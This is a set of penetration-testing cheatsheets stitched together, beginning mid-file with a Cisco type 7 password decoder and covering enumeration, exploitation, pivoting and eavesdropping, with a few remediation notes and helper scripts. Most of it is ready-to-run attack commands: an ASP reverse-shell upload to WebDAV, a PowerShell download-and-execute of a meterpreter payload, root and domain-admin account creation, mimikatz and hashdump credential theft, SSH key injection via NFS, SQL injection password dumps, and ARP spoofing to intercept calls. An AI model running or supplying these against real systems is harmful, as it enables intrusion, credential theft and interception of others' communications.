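Type 7: plaintext XORed byte-by-byte with the constant key below, starting at
the offset given by the two-digit decimal prefix. Recoverable instantly, so a
config containing 'password 7' lines is a config containing plaintext.
Type 5 ($1$ salted MD5-crypt) and later types are one-way; those go to a
cracker instead.
"""
import re
from typing import List, Tuple

# The constant XOR key used by every IOS / IOS-XE image for type 7.
XLAT = b"dsfd;kfoA,.iyewrkldJKDHSUBsgvca69834ncxv9873254k;fg87"


def type7_decode(enc: str) -> str:
    """Recover the plaintext from a type 7 string such as 0822455D0A16."""
    enc = enc.strip()
    if len(enc) < 4 or len(enc) % 2 or not re.fullmatch(r"[0-9A-Fa-f]+", enc):
        raise ValueError("not a type 7 string")
    seed = int(enc[:2], 10)          # IOS picks a seed in 0..15
    if seed > 15:
        raise ValueError("bad type 7 seed")
    data = bytes.fromhex(enc[2:])
    plain = bytes(b ^ XLAT[(seed + i) % len(XLAT)] for i, b in enumerate(data))
    return plain.decode("ascii")


def type7_encode(plain: str, seed: int = 7) -> str:
    """The same XOR the other way; 'service password-encryption' does exactly this."""
    data = plain.encode("ascii")
    enc = bytes(b ^ XLAT[(seed + i) % len(XLAT)] for i, b in enumerate(data))
    return f"{seed:02d}{enc.hex().upper()}"


# Credential-bearing IOS lines: keyword, type digit, value.
CRED_RE = re.compile(r"\b(?:password|secret|key-string|key)\s+(?P<type>\d)\s+(?P<value>\S+)")


def audit_config(config: str) -> List[Tuple[str, str, str]]:
    """Return (config line, finding, recovered or crackable value) per credential line."""
    findings = []
    for raw in config.splitlines():
        m = CRED_RE.search(raw)
        if not m:
            continue
        line, t, value = raw.strip(), m["type"], m["value"]
        if t == "7":
            findings.append((line, "type 7: reversible, decoded", type7_decode(value)))
        elif t == "0":
            findings.append((line, "type 0: plaintext", value))
        elif t == "5":
            findings.append((line, "type 5: salted MD5-crypt, crack offline (john/hashcat)", value))
        else:
            findings.append((line, f"type {t}: one-way, check which algorithm", value))
    return findings


# Constructed config fragment. The 'enable secret' and 'username jdoe' lines are
# the page's own examples; the vty password is made up (it is 'cisco').
SAMPLE_CONFIG = """\
!
enable secret 5 $1$iUjJ$cDZ03KKGh7mHfX2RSbDqP.
username jdoe password 7 07362E590E1B1C041B1E124C0A2F2E206832752E1A01134D
line vty 0 4
 password 7 0822455D0A16
"""

if __name__ == "__main__":
    for line, finding, value in audit_config(SAMPLE_CONFIG):
        print(f"{finding:55} {value!r:30} <- {line}")
```

Anything a `show running-config` or a TFTP'd backup reveals as type 7 (including SNMP communities, TACACS/RADIUS keys and `key chain` entries, which the regex also catches) should be reported as a cleartext credential, not as an "encrypted" one.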
enable - Change to privileged mode to view configs
config terminal / config t - Change to global config mode to modify

#show version - Gives you the router's configuration register (Firmware)
#show running-config - Shows the router, switch, or firewall's current configuration
#show ip route - Shows the router's routing table
#show tech-support - Dump config but obscure passwords

-------------------------------------------------------------------------- Remote Information Services

[+] DNS
Zone Transfer - host -l securitymuppets.com 192.168.100.2
Metasploit Auxiliaries:
auxiliary/gather/enum_dns
use auxiliary/gather/dns...

[+] Finger - Enumerate Users
finger @192.168.0.1
finger -l -p user@ip-address
auxiliary/scanner/finger/finger_users

[+] NTP
Metasploit Auxiliaries

[+] SNMP
onesixtyone -c /usr/share/doc/onesixtyone/dict.txt
Metasploit Module snmp_enum
snmpcheck -t snmpservice

[+] rservices
rwho 192.168.0.1
rlogin -l root 192.168.0.17

[+] RPC Services
rpcinfo -p
Endpoint_mapper metasploit

-------------------------------------------------------------------------- Web Services

[+] WebDAV
Metasploit Auxiliaries
Upload shell to Vulnerable WebDAV directory:
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.20 LPORT=4444 R | msfencode -t asp -o shell.asp
cadaver http://192.168.0.60/
put shell.asp shell.txt
copy shell.txt shell.asp;.txt
Start reverse handler - browse to http://192.168.0.60/shell.asp;.txt


-------------------------------------------------------------------------- Windows Networking Services

[+] Get Domain Information:
nltest /DCLIST:DomainName
nltest /DCNAME:DomainName
nltest /DSGETDC:DomainName

[+] Netbios Enumeration
nbtscan -r 192.168.0.1-100
nbtscan -f hostfiles.txt

[+] enum4linux

[+] RID Cycling
use auxiliary/scanner/smb/smb_lookupsid

[+] Null Session in Windows
net use \\192.168.0.1\IPC$ "" /u:""

[+] Null Session in Linux
smbclient -L //192.168.99.131

-------------------------------------------------------------------------- Accessing Email Services

Metasploit Auxiliaries

[+] SMTP Open Relay Commands

[-] ncat -C 86.54.23.178 25
[-] HELO mail.co.uk
[-] MAIL FROM:
[-] RCPT TO:
[-] DATA
Test Email - some malicious stuff!

-------------------------------------------------------------------------- VPN Testing

[+] ike-scan
ike-scan 192.168.207.134
sudo ike-scan -A 192.168.207.134
sudo ike-scan -A 192.168.207.134 --id=myid -P192-168-207-134key

[+] psk-crack
psk-crack -b 5 192-168-207-134key
psk-crack -b 5 --charset="0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz" 192-168-207-134key
psk-crack -d /path/to/dictionary 192-168-207-134key

-------------------------------------------------------------------------- Unix RPC

[+] NFS Mounts

Metasploit : auxiliary/scanner/nfs/nfsmount

rpcinfo -p 192.168.0.10

showmount -e 192.168.0.10
mount 192.168.0.10:/secret /mnt/share/

ssh-keygen
mkdir /tmp/r00t
mount -t nfs 192.168.0.10:/secret /mnt/share/
cat ~/.ssh/id_rsa.pub >> /mnt/share/root/.ssh/authorized_keys
umount /mnt/share
ssh root@192.168.0.10

-------------------------------------------------------------------------- Post Exploitation

[+] Command prompt access on Windows Host

pth-winexe -U Administrator% // cmd.exe

[+] Add Linux User
/usr/sbin/useradd -g 0 -u 0 -o user
echo user:password | /usr/sbin/chpasswd

[+] Add Windows User
net user username password@1 /add
net localgroup administrators username /add

[+] Solaris Commands
useradd -o user
passwd user
usermod -R root user

[+] Dump remote SAM:
PwDump.exe -u localadmin 192.168.0.1

[+] Mimikatz
mimikatz # privilege::debug
mimikatz # sekurlsa::logonPasswords full

[+] Meterpreter
meterpreter > run winenum
meterpreter > use post/windows/gather/smart_hashdump

meterpreter > use incognito
meterpreter > list_tokens -u
meterpreter > impersonate_token TVM\domainadmin
meterpreter > add_user hacker password1 -h 192.168.0.10
meterpreter > add_group_user "Domain Admins" hacker -h 192.168.0.10

meterpreter > load mimikatz
meterpreter > wdigest
meterpreter > getWdigestPasswords
Migrate if it does not work!

[+] Kitrap0d
Download vdmallowed.exe and vdmexploit.dll to victim
Run vdmallowed.exe to execute system shell

[+] Windows Information
On Windows:
ipconfig /all
systeminfo
net localgroup administrators
net view
net view /domain

[+] SSH Tunnelling
Remote forward port 222
ssh -R 127.0.0.1:4444:10.1.1.251:222 -p 443 root@192.168.10.118

-------------------------------------------------------------------------- Metasploit

----------------- [+] Metasploit Pivot

Compromise 1st machine

# meterpreter > run arp_scanner -r 10.10.10.0/24
route add 10.10.10.10 255.255.255.248
use auxiliary/scanner/portscan/tcp
use bind shell

or run autoroute:

# meterpreter > ipconfig
# meterpreter > run autoroute -s 10.1.13.0/24
# meterpreter > getsystem
# meterpreter > run hashdump
# use auxiliary/scanner/portscan/tcp
# msf auxiliary(tcp) > use exploit/windows/smb/psexec

or port forwarding:
# meterpreter > run autoroute -s 10.1.13.0/24
# use auxiliary/scanner/portscan/tcp
# meterpreter > portfwd add -l -p -r

or socks proxy:
route add 10.10.10.10 255.255.255.248
use auxiliary/server/socks4a
Add proxy to /etc/proxychains.conf
proxychains nmap -sT -T4 -Pn 10.10.10.50
setg socks4:127.0.0.1:1080

----------------- [+] Pass the hash

If NTLM only:
00000000000000000000000000000000:8846f7eaee8fb117ad06bdd830b7586c

STATUS_ACCESS_DENIED (Command=117 WordCount=0):
This can be remedied by navigating to the registry key "HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\LanManServer\Parameters" on the target systems and setting the value of "RequireSecuritySignature" to "0".

Run hashdump on the first compromised machine:
run post/windows/gather/hashdump

Run the psexec module and specify the hash:
use exploit/windows/smb/psexec

----------------- [+] Enable RDP:
meterpreter > run getgui -u hacker -p s3cr3t
Clean up command: meterpreter > run multi_console_command -rc /root/.msf3/logs/scripts/getgui/clean_up__20110112.2448.rc

----------------- [+] AutoRunScript
Automatically run scripts before exploitation:
set AutoRunScript "migrate explorer.exe"

[+] Set up SOCKS proxy in MSF

[+] Run a post module against all sessions
resource /usr/share/metasploit-framework/scripts/resource/run_all_post.rc

[+] Find local subnets 'Whilst in meterpreter shell'
meterpreter > run get_local_subnets

# Add the correct Local host and Local port parameters
echo "Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.0.7 -Lport 443 -Force" >> /var/www/payload

# Set up psexec module on metasploit
auxiliary/admin/smb/psexec_command
set command powershell -Exec Bypass -NoL -NoProfile -Command IEX (New-Object Net.WebClient).DownloadString(\'http://192.168.0.9/payload\')

# Start reverse Handler to catch the reverse connection
Module options (exploit/multi/handler):
Payload options (windows/meterpreter/reverse_https):

Name      Current Setting  Required  Description
----      ---------------  --------  -----------
EXITFUNC  process          yes       Exit technique: seh, thread, process, none
LHOST     192.168.0.9      yes       The local listener hostname
LPORT     443              yes       The local listener port

# Show evasion module options
show evasion

[+] Metasploit Shellcode
msfvenom -p windows/shell_bind_tcp -b '\x00\x0a\x0d'

-------------------------------------------------------------------------- File Transfer Services

[+] Start TFTPD Server
atftpd --daemon --port 69 /tmp

[+] Connect to TFTP Server
tftp 192.168.0.10
put / get files

-------------------------------------------------------------------------- LDAP Querying

Tools:
ldapsearch
LDAPExplorertool2

Anonymous Bind:
ldapsearch -h ldaphostname -p 389 -x -b "dc=domain,dc=com"

Authenticated:
ldapsearch -h 192.168.0.60 -p 389 -x -D "CN=Administrator, CN=User, DC=, DC=com" -b "DC=, DC=com" -W

Useful Links:
http://www.lanmaster53.com/2013/05/public-facing-ldap-enumeration/
http://blogs.splunk.com/2009/07/30/ldapsearch-is-your-friend/


-------------------------------------------------------------------------- Password Attacks

[+] Bruteforcing http password prompts
medusa -h -u -P -M http -n -m DIR:/ -T 30
--------------------------------------------------------------------------------
/Cheatsheet_Pyinstaller.txt:
--------------------------------------------------------------------------------
python.exe c:\Python27\PyInstaller-2.1\pyinstaller.py --noconsole --onefile c:\Python27\PyInstaller-2.1\ReverseShell.py

[+] Generate the .spec file.
[+] Windows: (You want a single EXE file with your data in it, hence --onefile).

python pyinstaller.py --onefile your_main_file.py

[+] Rebuild your package.

python pyinstaller.py your_main_file.spec

[+] Look for your .exe or your .app bundle in the dist directory.
--------------------------------------------------------------------------------
/Cheatsheet_Python.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jivoi/Cheatsheets/9bc195d4cc05728c4ee29312124ac57ed54bb160/Cheatsheet_Python.pdf
--------------------------------------------------------------------------------
/Cheatsheet_Remediations.txt:
--------------------------------------------------------------------------------
[+] Weak SSH Ciphers

sudo nano /etc/ssh/sshd_config

Add the following lines:

Ciphers aes128-ctr,aes192-ctr,aes256-ctr,arcfour256,arcfour128,arcfour
MACs hmac-sha1,hmac-ripemd160

Restart SSH


[+] Unquoted Service Paths

Run Regedit and browse to HKLM\SYSTEM\CurrentControlSet\services
Find the service in question and simply add " " either side of the ImagePath string.
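Before editing the registry by hand it helps to know which services actually need the quotes. The following is an added example (Python, not from the cheatsheet): it decides whether an ImagePath value is an unquoted executable path containing spaces and produces the quoted value you would write back, preserving any arguments. The sample values are constructed; `read_service_image_paths` reads the live registry with the standard `winreg` module and only works on Windows.

```python
import re

# Constructed ImagePath values of the kind found under
# HKLM\SYSTEM\CurrentControlSet\Services\<service>\ImagePath (not from a real host).
SAMPLE_IMAGE_PATHS = {
    "VulnSvc": r"C:\Program Files (x86)\Vuln\Vuln Software 7.0\software.exe -service",
    "QuotedSvc": r'"C:\Program Files\Good Vendor\agent.exe" /run',
    "SystemSvc": r"C:\Windows\system32\svchost.exe -k netsvcs",
    "NoSpaceSvc": r"C:\Tools\runner.exe",
}

_EXE_RE = re.compile(r"\.exe\b", re.IGNORECASE)


def split_image_path(image_path):
    """Split an ImagePath into (executable, arguments).
    A leading double quote delimits the executable explicitly; otherwise the
    executable is taken to end at the first ".exe" token."""
    s = image_path.strip()
    if s.startswith('"'):
        end = s.find('"', 1)
        if end == -1:                       # unterminated quote: rest is the path
            return s[1:], ""
        return s[1:end], s[end + 1:].strip()
    m = _EXE_RE.search(s)
    if m:
        return s[:m.end()], s[m.end():].strip()
    return s, ""                            # no .exe at all: whole value is the path


def is_unquoted_with_spaces(image_path):
    """True when the executable path is unquoted and contains a space, which is
    exactly the condition the registry edit above is meant to remove."""
    s = image_path.strip()
    if s.startswith('"'):
        return False
    exe, _ = split_image_path(s)
    return " " in exe


def quoted_fix(image_path):
    """The ImagePath value with the executable wrapped in quotes, arguments kept."""
    exe, args = split_image_path(image_path)
    return f'"{exe}"' + (f" {args}" if args else "")


def audit(image_paths):
    """Map service name -> corrected ImagePath for every service that needs quoting."""
    return {name: quoted_fix(p) for name, p in image_paths.items()
            if is_unquoted_with_spaces(p)}


def read_service_image_paths():
    """Windows only: collect ImagePath values from the live registry via winreg."""
    import winreg  # standard library on Windows; ImportError elsewhere
    result = {}
    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE,
                        r"SYSTEM\CurrentControlSet\Services") as services:
        subkey_count = winreg.QueryInfoKey(services)[0]
        for i in range(subkey_count):
            name = winreg.EnumKey(services, i)
            try:
                with winreg.OpenKey(services, name) as svc:
                    value, _ = winreg.QueryValueEx(svc, "ImagePath")
                    result[name] = value
            except OSError:                 # no ImagePath value, or access denied
                continue
    return result


if __name__ == "__main__":
    for name, fixed in audit(SAMPLE_IMAGE_PATHS).items():
        print(f"{name}: needs quoting -> {fixed}")
```

On a Windows host, `audit(read_service_image_paths())` gives the list to fix; the `icacls` check that follows is still worth running on each flagged path, since quoting removes the search ambiguity but not a writable directory.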
Check permissions:
C:\Users\user>icacls "C:\Program Files (x86)\Vuln\Vuln Software 7.0\software.exe"
--------------------------------------------------------------------------------
/Cheatsheet_SMBCapture.txt:
--------------------------------------------------------------------------------
[+] NBNS Spoof / Capture

[>] NBNS Spoof
msf > use auxiliary/spoof/nbns/nbns_response
msf auxiliary(nbns_response) > show options
msf auxiliary(nbns_response) > set INTERFACE eth0
msf auxiliary(nbns_response) > set SPOOFIP 10.10.10.10
msf auxiliary(nbns_response) > run

[>] SMB Capture

msf > use auxiliary/server/capture/smb
msf auxiliary(smb) > set JOHNPWFILE /tmp/john_smb
msf auxiliary(smb) > run

[>] HTTP NTLM Capture

msf auxiliary(smb) > use auxiliary/server/capture/http_ntlm
msf auxiliary(smb) > set JOHNPWFILE /tmp/john_http
msf auxiliary(smb) > set SRVPORT 80
msf auxiliary(smb) > set URIPATH /
msf auxiliary(smb) > run


Fix:
http://www.leonteale.co.uk/netbios-nbns-spoofing/

Solution
The solution to this is to disable Netbios from broadcasting. The setting for this is in what I hope is a very familiar place that you might not have really paid attention to before.

Netbios, according to Microsoft, is no longer needed as of Windows 2000.
However, there are a few side effects.
One of the unexpected consequences of disabling Netbios completely on your network is how this affects trusts between forests. Windows 2000 let you create an external (non-transitive) trust between a domain in one forest and a domain in a different forest so users in one forest could access resources in the trusting domain of the other forest.
Windows Server 2003 takes this a step further by allowing you to create a new type of two-way transitive trust called a forest trust, which allows users in any domain of one forest to access resources in any domain of the other forest. Amazingly, NetBIOS is actually still used in the trust creation process, even though Microsoft has officially "deprecated" NetBIOS in versions of Windows from 2000 on. So if you disable Netbios on your domain controllers, you won't be able to establish a forest trust between two Windows Server 2003 forests.
But Windows 2003 is pretty old, since as of writing we are generally on Windows 2012 now. So if you would like to disable Netbios on your servers yet will be affected by the side effect for forest trusts, then ideally you should upgrade and keep up with the times anyway. Alternatively, you can get away with, at the very least, disabling Netbios on your workstations.
See below for step by step instructions on disabling Netbios on workstations:

Windows XP, Windows Server 2003, and Windows 2000
On the desktop, right-click My Network Places, and then click Properties.
Right-click Local Area Connection, and then click Properties.
In the Components checked are used by this connection list, double-click Internet Protocol (TCP/IP), click Advanced, and then click the WINS tab. Note: In Windows XP and in Windows Server 2003, you must double-click Internet Protocol (TCP/IP) in the This connection uses the following items list.
Click Use NetBIOS setting from the DHCP server, and then click OK three times.

For Windows Vista
On the desktop, right-click Network, and then click Properties.
Under Tasks, click Manage network connections.
Right-click Local Area Connection, and then click Properties.
In the This connection uses the following items list, double-click Internet Protocol Version 4 (TCP/IPv4), click Advanced, and then click the WINS tab.
Click Use NetBIOS setting from the DHCP server, and then click OK three times.

For Windows 7
Click Start, and then click Control Panel.
Under Network and Internet, click View network status and tasks.
Click Change adapter settings.
Right-click Local Area Connection, and then click Properties.
In the This connection uses the following items list, double-click Internet Protocol Version 4 (TCP/IPv4), click Advanced, and then click the WINS tab.
Click Use NetBIOS setting from the DHCP server, and then click OK three times.
--------------------------------------------------------------------------------
/Cheatsheet_SMBEnumeration.txt:
--------------------------------------------------------------------------------
SMB Enumeration Techniques using Backtrack:

1. NBTSCAN

root@bt:~# nbtscan -r 10.0.2.0/24
Doing NBT name scan for addresses from 10.0.2.0/24

IP address       NetBIOS Name     Server   User             MAC address
------------------------------------------------------------------------------
10.0.2.0         Sendto failed: Permission denied
10.0.2.10
10.0.2.15        METASPLOITABLE            METASPLOITABLE   00-00-00-00-00-00
10.0.2.18        TEST01                    TEST01           00-11-21-22-1d-4d
10.0.2.45        TEST04                    TEST04           00-12-d2-34-11-55

2. NMAP

nmap -p 1-65535 -T4 -O -A -v 10.0.2.15

3. SMBCLIENT

root@bt:~# smbclient -L=10.0.2.15

Null Sessions

root@bt:~# smbclient \\\\10.0.2.15\\tmp
Enter root's password:
Anonymous login successful


SMB Enumeration Techniques using Windows Tools:

1. NetBIOS Enumerator (nbtenum)

http://nbtenum.sourceforge.net/
--------------------------------------------------------------------------------
/Cheatsheet_SMTPOpenRelay.txt:
--------------------------------------------------------------------------------
[+] SMTP Open Relay Commands

[-] ncat -C 86.54.23.178 25
[-] HELO mail.co.uk
[-] MAIL FROM:
[-] RCPT TO:
[-] DATA
Test Email
--------------------------------------------------------------------------------
/Cheatsheet_SQLInjection.txt:
--------------------------------------------------------------------------------
[+] Union Based SQL Injection

' or 1=1#

1' ORDER BY 10#

1' UNION SELECT version(),2#

1' UNION SELECT version(),database()#

1' UNION SELECT version(),user()#

1' UNION ALL SELECT table_name,2 from information_schema.tables#

1' UNION ALL SELECT column_name,2 from information_schema.columns where table_name = "users"#

1' UNION ALL SELECT concat(user,char(58),password),2 from users#


sqlmap --url="" -p username --user-agent=SQLMAP --threads=10 --eta --dbms=MySQL --os=Linux --banner --is-dba --users --passwords --current-user --dbs
--------------------------------------------------------------------------------
/Cheatsheet_SSLStrip.txt:
--------------------------------------------------------------------------------
1) Flip your machine into forwarding mode (as root):
echo "1" > /proc/sys/net/ipv4/ip_forward

2) Setup iptables to intercept HTTP requests (as root):
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080

3) sslstrip.py -l 8080 -f lock.ico

4) Run arpspoof to redirect traffic to your machine (as root):
arpspoof -i -t
--------------------------------------------------------------------------------
/Cheatsheet_Solaris.txt:
--------------------------------------------------------------------------------
[+] Solaris vulnerabilities:

Solaris 7:
sadmind_exec      SADMIND - weakness in default security settings - allows root - rootdown.pl
**ttyprompt       TELNET - buffer overflow in solaris login - manual through telnet client
sendmail_exec     LPD - line printer daemon buffer overflow - allows root
heap_noir         DTSPCD - CDE common desktop environment heap overflow TCP port 6112, runs with root
ypupdated_exec    YPUPDATED - weakness in handling of the command shell - allows root
kcms_readfile     kcms / ttdbserverd remote file read (only in msf2)

Solaris 8:
sadmind_exec      SADMIND - weakness in default security settings - allows root - rootdown.pl
**ttyprompt       TELNET - buffer overflow in solaris login - manual through telnet client
sendmail_exec     LPD - line printer daemon buffer overflow - allows root
heap_noir         DTSPCD - CDE common desktop environment heap overflow TCP port 6112, runs with root
ypupdated_exec    YPUPDATED - weakness in handling of the command shell - allows root.
no exploit - sadmind_adm_build_path    SADMIND - stack buffer overflow in adm_build_path() function.
kcms_readfile     kcms / ttdbserverd remote file read (only in msf2)

Solaris 9:
sadmind_exec      SADMIND - weakness in default security settings - allows root - rootdown.pl
ypupdated_exec    YPUPDATED - weakness in handling of the command shell - allows root.
sadmind_adm_build_path    SADMIND - stack buffer overflow in adm_build_path() function.
kcms_readfile     kcms / ttdbserverd remote file read (only in msf2)

Solaris 10:
fuser             TELNET - authentication bypass through -f command - can be manually exploited
ypupdated_exec    YPUPDATED - weakness in handling of the command shell - allows root.
Solaris 11:
fuser             TELNET - authentication bypass through -f command - can be manually exploited

[+] Adding solaris user:

useradd -u 0 -o pentestuser
passwd -d pentestuser

[+] In addition, familiarise yourself with rpcinfo, nfsshell, showmount, 'mount -t nfs'.
--------------------------------------------------------------------------------
/Cheatsheet_Tools.txt:
--------------------------------------------------------------------------------
Browser Addons
--------------

- Chrome:

Recx Security Analyser
Wappalyzer

- Firefox/Iceweasel:

Web Developer
Tamper Data
FoxyProxy Standard
User Agent Switcher
PassiveRecon
Wappalyzer
Firebug
HackBar
--------------------------------------------------------------------------------
/Cheatsheet_UsefulCommands.txt:
--------------------------------------------------------------------------------
Useful commands
---------------

[+] Remove text using sed

cat SSL_Hosts.txt | sed -r 's/\ttcp\t/:/g'

[+] Port forwarding using NCAT

ncat -lvkp 12345 -c "ncat --ssl 192.168.0.1 443"

[+] Windows 7 or later, build port relay

C:\> netsh interface portproxy add v4tov4 listenport= listenaddress=0.0.0.0 connectport= connectaddress=

[+] Grab HTTP Headers

curl -LIN

[+] Quickly generate an MD5 hash for a text string using OpenSSL

echo -n 'text to be encrypted' | openssl md5

[+] Shutdown a Windows machine from Linux

net rpc shutdown -I ipAddressOfWindowsPC -U username%password

[+] Conficker Detection with NMAP

nmap -PN -d -p445 --script=smb-check-vulns --script-args=safe=1 IP-RANGES

[+] Determine if a port is open with bash (uses bash's /dev/tcp pseudo-device; replace <host> and <port>)

(: </dev/tcp/<host>/<port>) 2>/dev/null && echo "OPEN" || echo "CLOSED"
--------------------------------------------------------------------------------
/Cheatsheet_VOIP.txt:
--------------------------------------------------------------------------------
VOIP (SIP) Cheatsheet
--------------------------------

SIP usually uses port 5060 TCP or UDP for unencrypted signalling, or 5061 for encrypted transport using TLS.

SIP is an ASCII-based protocol with elements similar to HTTP: it uses a request/response model. Much like an HTTP request from a browser, a SIP client request is made using a SIP URI, a user agent and a method/request. SIP uses e-mail-like addresses in the format user/phone@domain/ip. A typical SIP URI looks like:

sip:205@192.168.1.100, sip:username@pbx.com, sip:205@192.168.1.100:5060


[+] SIP Requests / Methods

Request     Description
INVITE      Used to invite an account to participate in a call session.
ACK         Acknowledge an INVITE request.
CANCEL      Cancel a pending request.
REGISTER    Register a user with a SIP server.
OPTIONS     Lists information about the capabilities of a caller.
BYE         Terminates a session between two users in a call.
REFER       Indicates that the recipient (identified by the Request URI) should contact a third party using the contact information provided in the request.
SUBSCRIBE   The SUBSCRIBE method is used to request current state and state updates from a remote node.
NOTIFY      The NOTIFY method is used to notify a SIP node that an event which has been requested by an earlier SUBSCRIBE method has occurred.
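A small parser that applies the request/response model above to real message text is a useful check when picking SIP out of a capture or validating what a device sent. The following is an added example (Python, not from the cheatsheet): it parses the start line and headers, enforces the mandatory headers and the Content-Length, and maps a response code to its class as in the SIP Responses table further down. The INVITE and 180 Ringing messages are constructed for the example, modelled on the INVITE shown later in this section; the addresses and tags are made up.

```python
import re
from dataclasses import dataclass
from typing import Dict, Optional

# Response classes, matching the SIP Responses table in this section.
RESPONSE_CLASSES = {
    "1": "Informational", "2": "Successful", "3": "Redirection",
    "4": "Request failure", "5": "Server failure", "6": "Global failure",
}

# Headers every SIP request and response must carry (RFC 3261).
REQUIRED_HEADERS = ("via", "to", "from", "call-id", "cseq")

_REQUEST_LINE = re.compile(r"^([A-Z]+) (\S+) SIP/2\.0$")
_STATUS_LINE = re.compile(r"^SIP/2\.0 (\d{3}) (.*)$")

# Constructed messages (addresses, tags and Call-ID are made up for the example).
SAMPLE_INVITE = (
    "INVITE sip:201@192.168.1.104 SIP/2.0\r\n"
    "Via: SIP/2.0/UDP 192.168.1.102;rport;branch=z9hG4bKvbxaoqar\r\n"
    "Max-Forwards: 70\r\n"
    "To: <sip:201@192.168.1.104>\r\n"
    "From: \"NightRanger\" <sip:200@192.168.1.102>;tag=eihgg\r\n"
    "Call-ID: hfxsabthoymshub@backtrack\r\n"
    "CSeq: 649 INVITE\r\n"
    "Contact: <sip:200@192.168.1.102:5060>\r\n"
    "Content-Type: application/sdp\r\n"
    "Content-Length: 5\r\n"
    "\r\n"
    "v=0\r\n"
)
SAMPLE_RINGING = (
    "SIP/2.0 180 Ringing\r\n"
    "Via: SIP/2.0/UDP 192.168.1.102;rport;branch=z9hG4bKvbxaoqar\r\n"
    "To: <sip:201@192.168.1.104>;tag=as1f2e3d\r\n"
    "From: \"NightRanger\" <sip:200@192.168.1.102>;tag=eihgg\r\n"
    "Call-ID: hfxsabthoymshub@backtrack\r\n"
    "CSeq: 649 INVITE\r\n"
    "Content-Length: 0\r\n"
    "\r\n"
)


@dataclass
class SipMessage:
    kind: str                   # "request" or "response"
    method: str                 # request method, or the method named in CSeq for a response
    request_uri: Optional[str]
    status: Optional[int]
    reason: Optional[str]
    headers: Dict[str, str]     # header names lower-cased
    body: str


def parse_sip(raw: str) -> SipMessage:
    """Parse one SIP message. Raises ValueError on a malformed or truncated message."""
    head, sep, body = raw.partition("\r\n\r\n")
    if not sep:
        raise ValueError("missing CRLFCRLF terminating the headers")
    start, *header_lines = head.split("\r\n")
    headers: Dict[str, str] = {}
    for line in header_lines:
        name, colon, value = line.partition(":")
        if not colon:
            raise ValueError(f"malformed header line: {line!r}")
        headers[name.strip().lower()] = value.strip()
    missing = [h for h in REQUIRED_HEADERS if h not in headers]
    if missing:
        raise ValueError(f"missing required headers: {missing}")
    # Content-Length guards against truncated datagrams or partial TCP reads
    declared = int(headers.get("content-length", "0"))
    if declared != len(body.encode()):
        raise ValueError(f"Content-Length {declared} != body length {len(body.encode())}")
    cseq_method = headers["cseq"].split()[-1].upper()
    if m := _STATUS_LINE.match(start):
        return SipMessage("response", cseq_method, None, int(m.group(1)), m.group(2), headers, body)
    if m := _REQUEST_LINE.match(start):
        return SipMessage("request", m.group(1), m.group(2), None, None, headers, body)
    raise ValueError(f"unrecognised start line: {start!r}")


def classify_response(status: int) -> str:
    """Map a 3-digit status code to its class (1xx Informational ... 6xx Global failure)."""
    return RESPONSE_CLASSES.get(str(status)[0], "Unknown")


def is_well_formed(raw: str) -> bool:
    try:
        parse_sip(raw)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    for raw in (SAMPLE_INVITE, SAMPLE_RINGING):
        msg = parse_sip(raw)
        label = msg.method if msg.kind == "request" else f"{msg.status} {msg.reason} ({classify_response(msg.status)})"
        print(f"{msg.kind}: {label}, Call-ID {msg.headers['call-id']}")
```

The Content-Length check is deliberate: a message that fails it is either cut off in transit or crafted, and either way should not be treated as a complete dialog step.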
[+] An Example SIP "INVITE" Request:

INVITE sip:201@192.168.1.104 SIP/2.0
Via: SIP/2.0/UDP 192.168.1.102;rport;branch=z9hG4bKvbxaoqar
Max-Forwards: 70

To:
From: "NightRanger" ;tag=eihgg
Call-ID: hfxsabthoymshub@backtrack
CSeq: 649 INVITE
Contact:
Content-Type: application/sdp

Allow: INVITE,ACK,BYE,CANCEL,OPTIONS,PRACK,REFER,NOTIFY,SUBSCRIBE,INFO,MESSAGE
Supported: replaces,norefersub,100rel
User-Agent: Twinkle/1.2

Content-Length: 310


[+] SIP Responses

Response  Description
1xx       Informational responses. Request received and being
2xx       Successful responses. The action was successfully received, understood, and accepted.
3xx       Redirection responses.
4xx       Request failure responses. The request contains bad syntax or cannot be fulfilled at the server.
5xx       Server failure responses. The server failed to fulfil an apparently valid request.
6xx       Global failure responses. The request cannot be fulfilled at any server.


[+] SIP Call Between 2 Phones Example

The calling phone sends an INVITE.
The called phone sends back a response of 100 (Trying).
The called phone then starts to ring and sends a response of 180 (Ringing).
When the caller picks up the phone, the called phone sends a response of 200 (OK).
The calling phone sends an ACK.
Conversation begins via RTP.
When the caller hangs up the phone, a BYE request is sent.
The calling phone responds with 200 (OK).


Information Gathering
---------------------

[+] SMAP - Simple scanner for SIP enabled devices.

./smap 192.168.1.104
./smap 192.168.1.130/24
./smap -O 192.168.1.104
./smap -l 192.168.1.104
./smap -d 192.168.1.104

[+] SIPSAK - Testing SIP enabled applications and devices using the OPTIONS request method only.
sipsak -vv -s sip:192.168.1.221

[+] SIPScan - Simple scanner for SIP enabled hosts.

./sip-scan -i eth0 192.168.1.1-254

[+] SVMAP (SIPVicious)

./svmap.py 192.168.1.1-254
./svmap.py 192.168.1.1-254 --fp


Extensions Enumeration
----------------------

[+] Svwar - Enumerate extensions by using a range of extensions or a dictionary file.

./svwar.py -e100-400 192.168.1.104
./svwar.py -e100-400 192.168.1.104 -m INVITE -v

[+] Enumiax - Enumerate Asterisk Exchange protocol usernames.

./enumiax -v -m3 -M3 192.168.1.104
./enumiax -d dict -v 192.168.1.104


Monitoring Traffic and Eavesdropping Phone calls
------------------------------------------------

Capturing SIP authentication (we will later discuss this topic in the attacking authentication section).
Eavesdropping on users' phone calls.

[+] ARP Poisoning using Arpspoof

echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -t victim gateway
arpspoof -t gateway victim

Capturing traffic and Eavesdropping using Wireshark

Capture Filter: not broadcast and not multicast and host

Wireshark: Decode captured VoIP call data into a playable audio format. This feature is under the Statistics -> VoIP Calls menu.


[+] Capturing SIP Authentication using SIPDump
SIPDump is part of the SIPCrack tool suite. It performs a live capture of SIP authentication digest responses, or it can dump them from a previously captured session in a PCAP file.
